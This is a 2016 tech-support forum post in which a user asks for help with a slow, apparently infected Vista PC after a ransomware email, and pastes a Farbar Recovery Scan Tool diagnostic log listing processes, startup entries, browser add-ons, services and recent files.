
CPU running at near 100% with nothing open



#1 pkight


Posted 04 November 2016 - 01:46 PM

My system has been bogged down to a crawl since I opened an email (UPS notification) which contained a ransom note, etc. I have been working with somebody else to clean up some issues but now he says it's time to post here for additional help. He had me download and run CC Cleaner and Malwarebytes and that found a few things. Task Manager shows "regsvr32.exe" using about 40% of the CPU and "svchost.exe" using about 50% of the CPU when I have nothing open. I have done the prep work requested and the logs are posted below. All help is really appreciated.

 

Thanks

Pat

 

Here are the logs:

 

Scan result of Farbar Recovery Scan Tool (FRST) (x86) Version: 03-11-2016
Ran by Pat (administrator) on PAT-PC (04-11-2016 10:02:56)
Running from C:\Users\Pat\Documents\Documents\Documents\Downloads
Loaded Profiles: Pat (Available Profiles: Pat)
Platform: Microsoft® Windows Vista™ Home Premium  Service Pack 2 (X86) Language: English (United States)
Internet Explorer Version 9 (Default browser: Chrome)
Boot Mode: Normal
 
==================== Processes (Whitelisted) =================
 
(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)
 
(Microsoft Corporation) C:\Program Files\Microsoft Security Client\MsMpEng.exe
(Microsoft Corporation) C:\Windows\System32\SLsvc.exe
(Carbonite, Inc. (www.carbonite.com)) C:\Program Files\Carbonite\Carbonite Backup\CarboniteService.exe
(Malwarebytes) C:\Program Files\Malwarebytes Anti-Malware\mbamscheduler.exe
(Malwarebytes) C:\Program Files\Malwarebytes Anti-Malware\mbamservice.exe
(Malwarebytes) C:\Program Files\Malwarebytes Anti-Malware\mbam.exe
(Microsoft Corp.) C:\Program Files\Common Files\microsoft shared\Windows Live\WLIDSVC.EXE
(Microsoft Corp.) C:\Program Files\Common Files\microsoft shared\Windows Live\WLIDSVCM.EXE
(Microsoft Corporation) C:\Program Files\Microsoft Security Client\msseces.exe
(Carbonite, Inc.) C:\Program Files\Carbonite\Carbonite Backup\CarboniteUI.exe
(Microsoft Corporation) C:\Program Files\Windows Media Player\wmpnscfg.exe
(Microsoft Corporation) C:\Windows\System32\regsvr32.exe
(Microsoft Corporation) C:\Windows\System32\regsvr32.exe
(Piriform Ltd) C:\Program Files\CCleaner\CCleaner.exe
(Microsoft Corporation) C:\Program Files\Microsoft Security Client\NisSrv.exe
(Microsoft Corporation) C:\Program Files\Microsoft Security Client\MpCmdRun.exe
(Microsoft Corporation) C:\Program Files\Microsoft Security Client\MpCmdRun.exe
(Google Inc.) C:\Users\Pat\AppData\Local\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Users\Pat\AppData\Local\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Users\Pat\AppData\Local\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Users\Pat\AppData\Local\Google\Chrome\Application\chrome.exe
(Microsoft Corporation) C:\Windows\System32\regsvr32.exe
 
 
==================== Registry (Whitelisted) ====================
 
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
 
HKLM\...\Run: [Windows Mobile Device Center] => C:\Windows\WindowsMobile\wmdc.exe [648072 2007-05-31] (Microsoft Corporation)
HKLM\...\Run: [MSC] => c:\Program Files\Microsoft Security Client\msseces.exe [1004064 2016-08-30] (Microsoft Corporation)
HKLM\...\Run: [Windows Defender] => C:\Program Files\Windows Defender\MSASCui.exe [1008184 2008-01-19] (Microsoft Corporation)
HKLM\...\Run: [Carbonite Backup] => C:\Program Files\Carbonite\Carbonite Backup\CarboniteUI.exe [1154744 2016-05-19] (Carbonite, Inc.)
HKU\S-1-5-19\...\Run: [WindowsWelcomeCenter] => C:\Windows\system32\oobefldr.dll [2153472 2009-04-10] (Microsoft Corporation)
HKU\S-1-5-20\...\Run: [WindowsWelcomeCenter] => C:\Windows\system32\oobefldr.dll [2153472 2009-04-10] (Microsoft Corporation)
HKU\S-1-5-21-598873941-3244639055-2830076859-1000\...\Run: [] => [X]
HKU\S-1-5-21-598873941-3244639055-2830076859-1000\...\Run: [**uxetnbtsu<*>] => "C:\Users\Pat\AppData\Local\d102cc\256774.lnk" <===== ATTENTION (Value Name with invalid characters)
HKU\S-1-5-21-598873941-3244639055-2830076859-1000\...\Run: [CCleaner Monitoring] => C:\Program Files\CCleaner\CCleaner.exe [6889176 2016-09-28] (Piriform Ltd)
HKU\S-1-5-21-598873941-3244639055-2830076859-1000\Control Panel\Desktop\\SCRNSAVE.EXE -> C:\Windows\system32\Mystify.scr [221184 2008-01-19] (Microsoft Corporation)
ShellIconOverlayIdentifiers: [ Carbonite.Green] -> {95A27763-F62A-4114-9072-E81D87DE3B68} => C:\Program Files\Carbonite\Carbonite Backup\CarboniteNSE.dll [2016-05-19] (Carbonite, Inc.)
ShellIconOverlayIdentifiers: [ Carbonite.Partial] -> {E300CD91-100F-4E67-9AF3-1384A6124015} => C:\Program Files\Carbonite\Carbonite Backup\CarboniteNSE.dll [2016-05-19] (Carbonite, Inc.)
ShellIconOverlayIdentifiers: [ Carbonite.Yellow] -> {5E529433-B50E-4bef-A63B-16A6B71B071A} => C:\Program Files\Carbonite\Carbonite Backup\CarboniteNSE.dll [2016-05-19] (Carbonite, Inc.)
ShellIconOverlayIdentifiers: [Carbonite.Green] -> {95A27763-F62A-4114-9072-E81D87DE3B68} => C:\Program Files\Carbonite\Carbonite Backup\CarboniteNSE.dll [2016-05-19] (Carbonite, Inc.)
ShellIconOverlayIdentifiers: [Carbonite.Partial] -> {E300CD91-100F-4E67-9AF3-1384A6124015} => C:\Program Files\Carbonite\Carbonite Backup\CarboniteNSE.dll [2016-05-19] (Carbonite, Inc.)
ShellIconOverlayIdentifiers: [Carbonite.Yellow] -> {5E529433-B50E-4bef-A63B-16A6B71B071A} => C:\Program Files\Carbonite\Carbonite Backup\CarboniteNSE.dll [2016-05-19] (Carbonite, Inc.)
Startup: C:\Users\Pat\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\bccb5d.lnk [2016-11-04]
ShortcutTarget: bccb5d.lnk -> C:\Windows\System32\mshta.exe (Microsoft Corporation)
Startup: C:\Users\Pat\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d921d0.lnk [2016-09-22]
ShortcutTarget: d921d0.lnk -> C:\Windows\System32\cmd.exe (Microsoft Corporation)
GroupPolicy: Restriction ? <======= ATTENTION
CHR HKLM\SOFTWARE\Policies\Google: Restriction <======= ATTENTION
 
==================== Internet (Whitelisted) ====================
 
(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)
 
Tcpip\Parameters: [DhcpNameServer] 192.168.1.1
Tcpip\..\Interfaces\{AA555C5C-7EFB-4FA2-B180-015E64B29B2C}: [DhcpNameServer] 192.168.1.1
Tcpip\..\Interfaces\{CB9C20A5-549E-4A87-B481-B8D6C1898EC8}: [DhcpNameServer] 192.168.1.1
 
Internet Explorer:
==================
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://go.microsoft.com/fwlink/?LinkID=617911&ResetID=130901137549257230&GUID=022E0370-D2B1-4B56-8A8B-3C53685A8927
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.google.com/ig/dell?hl=en&client=dell-usuk&channel=us&ibd=0071127
HKU\S-1-5-21-598873941-3244639055-2830076859-1000\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www22.verizon.com/Foryourhome/MyAccount/Unprotected/UserManagement/Login/Login.aspx
HKU\S-1-5-21-598873941-3244639055-2830076859-1000\Software\Microsoft\Internet Explorer\Main,Start Page Restore = hxxp://home.jzip.com
SearchScopes: HKLM -> DefaultScope value is missing
SearchScopes: HKU\.DEFAULT -> {CCC7A320-B3CA-4199-B1A6-9F516DD69829} URL = hxxp://us.yhs.search.yahoo.com/avg/search?fr=yhs-avgb-chrome&type=yahoo_avg_hs2-tb-web_chrome_us&p={searchTerms}
SearchScopes: HKU\S-1-5-21-598873941-3244639055-2830076859-1000 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxp://www.bing.com/search?q={searchTerms}&form=MSSEDF&pc=MSSE
SearchScopes: HKU\S-1-5-21-598873941-3244639055-2830076859-1000 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxp://www.bing.com/search?q={searchTerms}&form=MSSEDF&pc=MSSE
SearchScopes: HKU\S-1-5-21-598873941-3244639055-2830076859-1000 -> {DECA3892-BA8F-44b8-A993-A466AD694AE4} URL = hxxp://search.yahoo.com/search?p={searchTerms}&fr=chr-i3752
BHO: Adobe PDF Link Helper -> {18DF081C-E8AD-4283-A596-FA578C2EBDC3} -> C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll [2015-09-24] (Adobe Systems Incorporated)
BHO: Spybot-S&D IE Protection -> {53707962-6F74-2D53-2644-206D7942484F} -> C:\Program Files\Spybot - Search & Destroy\SDHelper.dll [2009-01-26] (Safer Networking Limited)
BHO: Yahoo! IE Services Button -> {5BAB4B5B-68BC-4B02-94D6-2FC0DE4A7897} -> C:\Program Files\Yahoo!\Common\yiesrvc.dll [2007-12-12] (Yahoo! Inc.)
BHO: Google Toolbar Helper -> {AA58ED58-01DD-4d91-8333-CF10577473F7} -> C:\Program Files\Google\Google Toolbar\GoogleToolbar_32.dll [2016-07-01] (Google Inc.)
BHO: Java™ Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files\Java\jre6\bin\jp2ssv.dll => No File
BHO: HP Smart BHO Class -> {FFFFFFFF-CF4E-4F2B-BDC2-0E72E116A856} -> C:\Program Files\Hewlett-Packard\Digital Imaging\Smart Web Printing\hpswp_BHO.dll [2007-11-06] (Hewlett-Packard Co.)
Toolbar: HKLM - Google Toolbar - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - C:\Program Files\Google\Google Toolbar\GoogleToolbar_32.dll [2016-07-01] (Google Inc.)
Toolbar: HKU\.DEFAULT -> Google Toolbar - {2318C2B1-4965-11D4-9B18-009027A5CD4F} - C:\Program Files\Google\Google Toolbar\GoogleToolbar_32.dll [2016-07-01] (Google Inc.)
Toolbar: HKU\S-1-5-21-598873941-3244639055-2830076859-1000 -> Google Toolbar - {2318C2B1-4965-11D4-9B18-009027A5CD4F} - C:\Program Files\Google\Google Toolbar\GoogleToolbar_32.dll [2016-07-01] (Google Inc.)
Toolbar: HKU\S-1-5-21-598873941-3244639055-2830076859-1000 -> No Name - {A057A204-BACC-4D26-9990-79A187E2698E} -  No File
DPF: {02BF25D5-8C17-4B23-BC80-D3488ABDDC6B} hxxp://appldnld.apple.com.edgesuite.net/content.info.apple.com/QuickTime/qtactivex/qtplugin.cab
DPF: {166B1BCA-3F9C-11CF-8075-444553540000} hxxp://download.macromedia.com/pub/shockwave/cabs/director/sw.cab
DPF: {17492023-C23A-453E-A040-C7C580BBF700} hxxp://download.microsoft.com/download/5/b/0/5b0d4654-aa20-495c-b89f-c1c34c691085/LegitCheckControl.cab
DPF: {30528230-99f7-4bb4-88d8-fa1d4f56a2ab} C:\Program Files\Yahoo!\Common\Yinsthelper.dll
DPF: {8FFBE65D-2C9C-4669-84BD-5829DC0B603C} hxxp://fpdownload.macromedia.com/get/flashplayer/current/polarbear/ultrashim.cab
DPF: {E2883E8F-472F-4FB0-9522-AC9BF37916A7} hxxp://platformdl.adobe.com/NOS/getPlusPlus/1.6/gp.cab
 
FireFox:
========
FF HKLM\...\Firefox\Extensions: [{20a82645-c095-46ed-80e3-08825760534b}] - c:\Windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\DotNetAssistantExtension
FF Extension: (Microsoft .NET Framework Assistant) - c:\Windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\DotNetAssistantExtension [2009-08-20] [not signed]
FF HKLM\...\Firefox\Extensions: [quickprint@hp.com] - C:\Program Files\Hewlett-Packard\SmartPrint\QPExtension
FF Extension: (HP Smart Print) - C:\Program Files\Hewlett-Packard\SmartPrint\QPExtension [2013-02-22] [not signed]
FF HKLM\...\Firefox\Extensions: [{ABDE892B-13A8-4d1b-88E6-365A6E755758}] - C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\Firefox\Ext
FF Extension: (RealDownloader) - C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\Firefox\Ext [2013-10-09] [not signed]
FF HKLM\...\Firefox\Extensions: [{DF153AFF-6948-45d7-AC98-4FC4AF8A08E2}] - C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\Firefox\Ext
FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF32_23_0_0_205.dll [2016-10-26] ()
FF Plugin: @adobe.com/ShockwavePlayer -> C:\Windows\system32\Adobe\Director\np32dsw.dll [2008-03-19] (Adobe Systems, Inc.)
FF Plugin: @Apple.com/iTunes,version=1.0 -> C:\Program Files\iTunes\Mozilla Plugins\npitunes.dll [2008-07-10] ()
FF Plugin: @Google.com/GoogleEarthPlugin -> C:\Program Files\Google\Google Earth\plugin\npgeplugin.dll [2015-05-21] (Google)
FF Plugin: @google.com/npPicasa2,version=2.0.0 -> C:\Program Files\Picasa2\npPicasa2.dll [No File]
FF Plugin: @google.com/npPicasa3,version=3.0.0 -> C:\Program Files\Google\Picasa3\npPicasa3.dll [2013-12-23] (Google, Inc.)
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\5.1.50709.0\npctrl.dll [2016-07-11] ( Microsoft Corporation)
FF Plugin: @microsoft.com/WLPG,version=15.4.3502.0922 -> C:\Program Files\Windows Live\Photo Gallery\NPWLPG.dll [2010-09-23] (Microsoft Corporation)
FF Plugin: @microsoft.com/WPF,version=3.5 -> c:\Windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\NPWPF.dll [2008-07-29] (Microsoft Corporation)
FF Plugin: @pack.google.com/Google Updater;version=14 -> C:\Program Files\Google\Google Updater\2.4.2432.1652\npCIDetect14.dll [2011-09-16] (Google)
FF Plugin: @real.com/nppl3260;version=16.0.3.51 -> c:\program files\real\realplayer\Netscape6\nppl3260.dll [2013-10-09] (RealNetworks, Inc.)
FF Plugin: @real.com/nprndlchromebrowserrecordext;version=1.3.3 -> C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\MozillaPlugins\nprndlchromebrowserrecordext.dll [2013-08-14] (RealNetworks, Inc.)
FF Plugin: @real.com/nprndlhtml5videoshim;version=1.3.3 -> C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\MozillaPlugins\nprndlhtml5videoshim.dll [2013-08-14] (RealNetworks, Inc.)
FF Plugin: @real.com/nprndlpepperflashvideoshim;version=1.3.3 -> C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\MozillaPlugins\nprndlpepperflashvideoshim.dll [2013-08-14] (RealNetworks, Inc.)
FF Plugin: @real.com/nprpchromebrowserrecordext;version=15.0.6.14 -> C:\ProgramData\Real\RealPlayer\BrowserRecordPlugin\MozillaPlugins\nprpchromebrowserrecordext.dll [2012-10-10] (RealNetworks, Inc.)
FF Plugin: @real.com/nprphtml5videoshim;version=15.0.6.14 -> C:\ProgramData\Real\RealPlayer\BrowserRecordPlugin\MozillaPlugins\nprphtml5videoshim.dll [2012-10-10] (RealNetworks, Inc.)
FF Plugin: @real.com/nprpplugin;version=16.0.3.51 -> c:\program files\real\realplayer\Netscape6\nprpplugin.dll [2013-10-09] (RealPlayer)
FF Plugin: @realnetworks.com/npdlplugin;version=1 -> C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\npdlplugin.dll [2013-08-14] (RealDownloader)
FF Plugin: @tools.google.com/Google Update;version=3 -> C:\Program Files\Google\Update\1.3.31.5\npGoogleUpdate3.dll [2016-08-06] (Google Inc.)
FF Plugin: @tools.google.com/Google Update;version=9 -> C:\Program Files\Google\Update\1.3.31.5\npGoogleUpdate3.dll [2016-08-06] (Google Inc.)
FF Plugin: Adobe Reader -> C:\Program Files\Adobe\Reader 10.0\Reader\AIR\nppdf32.dll [2015-09-24] (Adobe Systems Inc.)
FF Plugin HKU\S-1-5-21-598873941-3244639055-2830076859-1000: @citrixonline.com/appdetectorplugin -> C:\Users\Pat\AppData\Local\Citrix\Plugins\104\npappdetector.dll [2014-06-04] (Citrix Online)
FF Plugin HKU\S-1-5-21-598873941-3244639055-2830076859-1000: @tools.google.com/Google Update;version=3 -> C:\Users\Pat\AppData\Local\Google\Update\1.3.29.1\npGoogleUpdate3.dll [2015-12-26] (Google Inc.)
FF Plugin HKU\S-1-5-21-598873941-3244639055-2830076859-1000: @tools.google.com/Google Update;version=9 -> C:\Users\Pat\AppData\Local\Google\Update\1.3.29.1\npGoogleUpdate3.dll [2015-12-26] (Google Inc.)
FF Plugin HKU\S-1-5-21-598873941-3244639055-2830076859-1000: @zoom.us/ZoomVideoPlugin -> C:\Users\Pat\AppData\Roaming\Zoom\bin\npzoomplugin.dll [2012-09-04] (Zoom Video Communications, Inc.)
 
Chrome: 
=======
CHR DefaultProfile: Default
CHR StartupUrls: Default -> "hxxp://www.google.com/"
CHR Profile: C:\Users\Pat\AppData\Local\Google\Chrome\User Data\Default [2016-11-04]
CHR Extension: (Google Slides) - C:\Users\Pat\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2016-10-25]
CHR Extension: (Google Docs) - C:\Users\Pat\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2016-10-25]
CHR Extension: (Google Drive) - C:\Users\Pat\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2016-10-25]
CHR Extension: (YouTube) - C:\Users\Pat\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2016-10-25]
CHR Extension: (Google Sheets) - C:\Users\Pat\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2016-10-25]
CHR Extension: (InboxAce) - C:\Users\Pat\AppData\Local\Google\Chrome\User Data\Default\Extensions\fkfcmeoepjhclglafbppmeidjjolcgid [2016-09-29]
CHR Extension: (Google Docs Offline) - C:\Users\Pat\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2016-10-25]
CHR Extension: (RealDownloader) - C:\Users\Pat\AppData\Local\Google\Chrome\User Data\Default\Extensions\idhngdhcfkoamngbedgpaokgjbnpdiji [2015-02-05]
CHR Extension: (Chrome Web Store Payments) - C:\Users\Pat\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2016-04-02]
CHR Extension: (Gmail) - C:\Users\Pat\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2016-10-25]
CHR HKLM\...\Chrome\Extension: [idhngdhcfkoamngbedgpaokgjbnpdiji] - C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\Chrome\Ext\realdownloader.crx [2013-08-14]
StartMenuInternet: chrome.exe - C:\Users\Pat\AppData\Local\Google\Chrome\Application\chrome.exe
StartMenuInternet: Google Chrome - C:\Users\Pat\AppData\Local\Google\Chrome\Application\chrome.exe
 
==================== Services (Whitelisted) ====================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
S4 AERTFilters; C:\Windows\system32\AERTSrv.exe [77824 2007-12-05] (Andrea Electronics Corporation)
S4 Apple Mobile Device; C:\Program Files\Common Files\Apple\Mobile Device Support\bin\AppleMobileDeviceService.exe [116040 2008-07-10] (Apple Inc.)
R2 CarboniteService; C:\Program Files\Carbonite\Carbonite Backup\carboniteservice.exe [6370488 2016-05-19] (Carbonite, Inc. (www.carbonite.com))
S4 CCALib8; C:\Program Files\Canon\CAL\CALMAIN.exe [86606 2005-06-02] (Canon Inc.) [File not signed]
S4 DSBrokerService; C:\Program Files\DellSupport\brkrsvc.exe [70656 2007-03-19] () [File not signed]
S4 Garmin Core Update Service; C:\Program Files\Garmin\Core Update Service\Garmin.Cartography.MapUpdate.CoreService.exe [387928 2014-02-12] (Garmin Ltd or its subsidiaries)
S4 GoogleDesktopManager; C:\Program Files\Google\Google Desktop Search\GoogleDesktop.exe [1838592 2007-11-27] (Google) [File not signed]
R3 hpqcxs08; C:\Program Files\Hewlett-Packard\Digital Imaging\bin\hpqcxs08.dll [217088 2008-03-07] (Hewlett-Packard Co.) [File not signed]
S2 hpqddsvc; C:\Program Files\Hewlett-Packard\Digital Imaging\bin\hpqddsvc.dll [139264 2007-11-06] (Hewlett-Packard Co.) [File not signed]
S4 IDriverT; C:\Program Files\Common Files\InstallShield\Driver\1050\Intel 32\IDriverT.exe [73728 2004-10-22] (Macrovision Corporation) [File not signed]
R2 MBAMScheduler; C:\Program Files\Malwarebytes Anti-Malware\mbamscheduler.exe [1514464 2016-03-10] (Malwarebytes)
R2 MBAMService; C:\Program Files\Malwarebytes Anti-Malware\mbamservice.exe [1136608 2016-03-10] (Malwarebytes)
R2 MsMpSvc; c:\Program Files\Microsoft Security Client\MsMpEng.exe [104200 2016-08-30] (Microsoft Corporation)
R3 NisSrv; c:\Program Files\Microsoft Security Client\NisSrv.exe [280864 2016-08-30] (Microsoft Corporation)
S4 RealNetworks Downloader Resolver Service; C:\Program Files\RealNetworks\RealDownloader\rndlresolversvc.exe [39056 2013-08-14] ()
S4 SBSDWSCService; C:\Program Files\Spybot - Search & Destroy\SDWinSec.exe [1153368 2009-01-26] (Safer Networking Ltd.)
S4 sprtsvc_dellsupportcenter; C:\Program Files\Dell Support Center\bin\sprtsvc.exe [201968 2008-08-13] (SupportSoft, Inc.)
S4 stllssvr; C:\Program Files\Common Files\SureThing Shared\stllssvr.exe [73728 2006-09-14] (MicroVision Development, Inc.) [File not signed]
S2 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [272952 2008-01-19] (Microsoft Corporation)
S2 Net Driver HPZ12; C:\Windows\system32\HPZinw12.dll [X]
S2 Pml Driver HPZ12; C:\Windows\system32\HPZipm12.dll [X]
 
===================== Drivers (Whitelisted) ======================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
R0 AFS; C:\Windows\system32\Drivers\AFS.sys [77004 2008-04-24] (Oak Technology Inc.) [File not signed]
S3 DSproct; C:\Program Files\DellSupport\GTAction\triggers\DSproct.sys [4736 2006-10-05] (Gteko Ltd.) [File not signed]
S3 hitmanpro37; C:\Windows\system32\drivers\hitmanpro37.sys [30976 2014-04-01] ()
R3 MBAMProtector; C:\Windows\system32\drivers\mbam.sys [24448 2016-03-10] (Malwarebytes)
R3 MBAMSwissArmy; C:\Windows\system32\drivers\MBAMSwissArmy.sys [170200 2016-11-04] (Malwarebytes)
R3 MBAMWebAccessControl; C:\Windows\system32\drivers\mwac.sys [53120 2016-03-10] (Malwarebytes Corporation)
R0 MpFilter; C:\Windows\System32\DRIVERS\MpFilter.sys [252808 2016-08-25] (Microsoft Corporation)
S4 blbdrive; \SystemRoot\system32\drivers\blbdrive.sys [X]
S3 IpInIp; system32\DRIVERS\ipinip.sys [X]
S3 NwlnkFlt; system32\DRIVERS\nwlnkflt.sys [X]
S3 NwlnkFwd; system32\DRIVERS\nwlnkfwd.sys [X]
 
==================== NetSvcs (Whitelisted) ===================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
 
==================== One Month Created files and folders ========
 
(If an entry is included in the fixlist, the file/folder will be moved.)
 
2016-11-04 10:02 - 2016-11-04 10:02 - 00000000 ____D C:\FRST
2016-11-03 05:46 - 2016-11-03 05:46 - 00041281 _____ C:\Users\Pat\Documents\Documents\Documents\Services running.txt
2016-11-03 05:12 - 2016-11-03 05:12 - 00089631 _____ C:\Users\Pat\Documents\Documents\Documents\Fix list.pdf
2016-11-02 09:56 - 2016-11-02 09:56 - 00000000 ____D C:\Users\Pat\AppData\Local\ESET
2016-11-02 06:49 - 2016-11-03 15:55 - 00000000 ____D C:\Users\Pat\AppData\LocalLow\HPAppData
2016-11-01 15:35 - 2016-11-01 15:35 - 00001070 _____ C:\MBAM 11.1.16.txt
2016-11-01 11:59 - 2016-11-04 09:23 - 00170200 _____ (Malwarebytes) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2016-11-01 11:56 - 2016-11-01 11:56 - 00000861 _____ C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
2016-11-01 11:56 - 2016-11-01 11:56 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
2016-11-01 11:56 - 2016-11-01 11:56 - 00000000 ____D C:\ProgramData\Malwarebytes
2016-11-01 11:56 - 2016-11-01 11:56 - 00000000 ____D C:\Program Files\Malwarebytes Anti-Malware
2016-11-01 11:56 - 2016-03-10 14:09 - 00053120 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mwac.sys
2016-11-01 11:56 - 2016-03-10 14:08 - 00126336 _____ (Malwarebytes) C:\Windows\system32\Drivers\mbamchameleon.sys
2016-11-01 11:56 - 2016-03-10 14:08 - 00024448 _____ (Malwarebytes) C:\Windows\system32\Drivers\mbam.sys
2016-11-01 10:58 - 2016-11-01 10:58 - 00000766 _____ C:\Users\Public\Desktop\CCleaner.lnk
2016-11-01 10:58 - 2016-11-01 10:58 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\CCleaner
2016-11-01 10:58 - 2016-11-01 10:58 - 00000000 ____D C:\Program Files\CCleaner
2016-11-01 10:12 - 2016-11-01 10:12 - 00206234 _____ C:\Users\Pat\Documents\Documents\Documents\aa_patch in msconfig.pdf
2016-10-31 11:33 - 2016-10-31 11:33 - 00162429 _____ C:\Users\Pat\Documents\Documents\Documents\Interjet trip.pdf
2016-10-25 10:57 - 2016-10-25 11:16 - 00000000 ____D C:\ProgramData\~0
2016-10-20 15:44 - 2016-10-20 15:44 - 00150414 _____ C:\Users\Pat\Documents\Documents\Documents\Actual vs. Budget Sept 2016.pdf
2016-10-20 15:44 - 2016-10-20 15:44 - 00082667 _____ C:\Users\Pat\Documents\Documents\Documents\MSSL Financial Report Sept 2016.pdf
2016-10-20 15:23 - 2016-10-20 15:40 - 00011119 _____ C:\Users\Pat\Documents\Documents\Documents\MSSL Financial Report Sept 2016.xlsx
 
==================== One Month Modified files and folders ========
 
(If an entry is included in the fixlist, the file/folder will be moved.)
 
2016-11-04 10:01 - 2013-03-11 16:11 - 00000830 _____ C:\Windows\Tasks\Adobe Flash Player Updater.job
2016-11-04 09:40 - 2006-11-02 03:22 - 72876032 _____ C:\Windows\system32\config\software_previous
2016-11-04 09:40 - 2006-11-02 03:22 - 19398656 _____ C:\Windows\system32\config\system_previous
2016-11-04 09:39 - 2014-04-25 17:09 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\BlackBerry
2016-11-04 09:39 - 2012-02-03 07:42 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\QuickTime
2016-11-04 09:39 - 2012-02-03 07:41 - 00000000 ____D C:\Program Files\QuickTime
2016-11-04 09:39 - 2009-03-24 10:04 - 00000000 ____D C:\Program Files\Common Files\Research In Motion
2016-11-04 09:39 - 2008-10-23 14:21 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\HP
2016-11-04 09:39 - 2008-02-20 08:12 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Spybot - Search & Destroy
2016-11-04 09:39 - 2007-12-22 17:13 - 00000000 ____D C:\ProgramData\Spybot - Search & Destroy
2016-11-04 09:39 - 2007-12-22 17:13 - 00000000 ____D C:\Program Files\Spybot - Search & Destroy
2016-11-04 09:39 - 2007-12-13 14:30 - 00000000 ____D C:\Users\Pat
2016-11-04 09:39 - 2007-11-27 01:54 - 00000000 ____D C:\Program Files\Common Files\SureThing Shared
2016-11-04 09:39 - 2006-11-02 04:18 - 00000000 ____D C:\Windows\system32\spool
2016-11-04 09:39 - 2006-11-02 04:18 - 00000000 ____D C:\Windows\system32\Msdtc
2016-11-04 09:39 - 2006-11-02 04:18 - 00000000 ____D C:\Windows\registration
2016-11-04 09:39 - 2006-11-02 04:18 - 00000000 ____D C:\Windows\inf
2016-11-04 09:37 - 2014-04-25 17:09 - 00000000 ____D C:\Program Files\Research In Motion
2016-11-04 09:33 - 2006-11-02 03:22 - 60555264 _____ C:\Windows\system32\config\components_previous
2016-11-04 09:33 - 2006-11-02 03:22 - 00262144 _____ C:\Windows\system32\config\sam_previous
2016-11-04 08:57 - 2009-12-26 22:19 - 00000886 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job
2016-11-04 08:57 - 2009-12-26 22:19 - 00000882 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job
2016-11-04 08:57 - 2009-06-29 20:52 - 00000900 _____ C:\Windows\Tasks\GoogleUpdateTaskUserS-1-5-21-598873941-3244639055-2830076859-1000UA.job
2016-11-04 08:57 - 2009-06-29 20:52 - 00000848 _____ C:\Windows\Tasks\GoogleUpdateTaskUserS-1-5-21-598873941-3244639055-2830076859-1000Core.job
2016-11-04 08:57 - 2009-04-16 09:15 - 00000848 _____ C:\Windows\Tasks\GoogleUpdateTaskUserS-1-5-21-598873941-3244639055-2830076859-1000.job
2016-11-04 08:57 - 2006-11-02 06:01 - 00032552 _____ C:\Windows\Tasks\SCHEDLGU.TXT
2016-11-04 08:57 - 2006-11-02 06:01 - 00000006 ____H C:\Windows\Tasks\SA.DAT
2016-11-04 08:57 - 2006-11-02 05:47 - 00003696 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-2P-1.C7483456-A289-439d-8115-601632D005A0
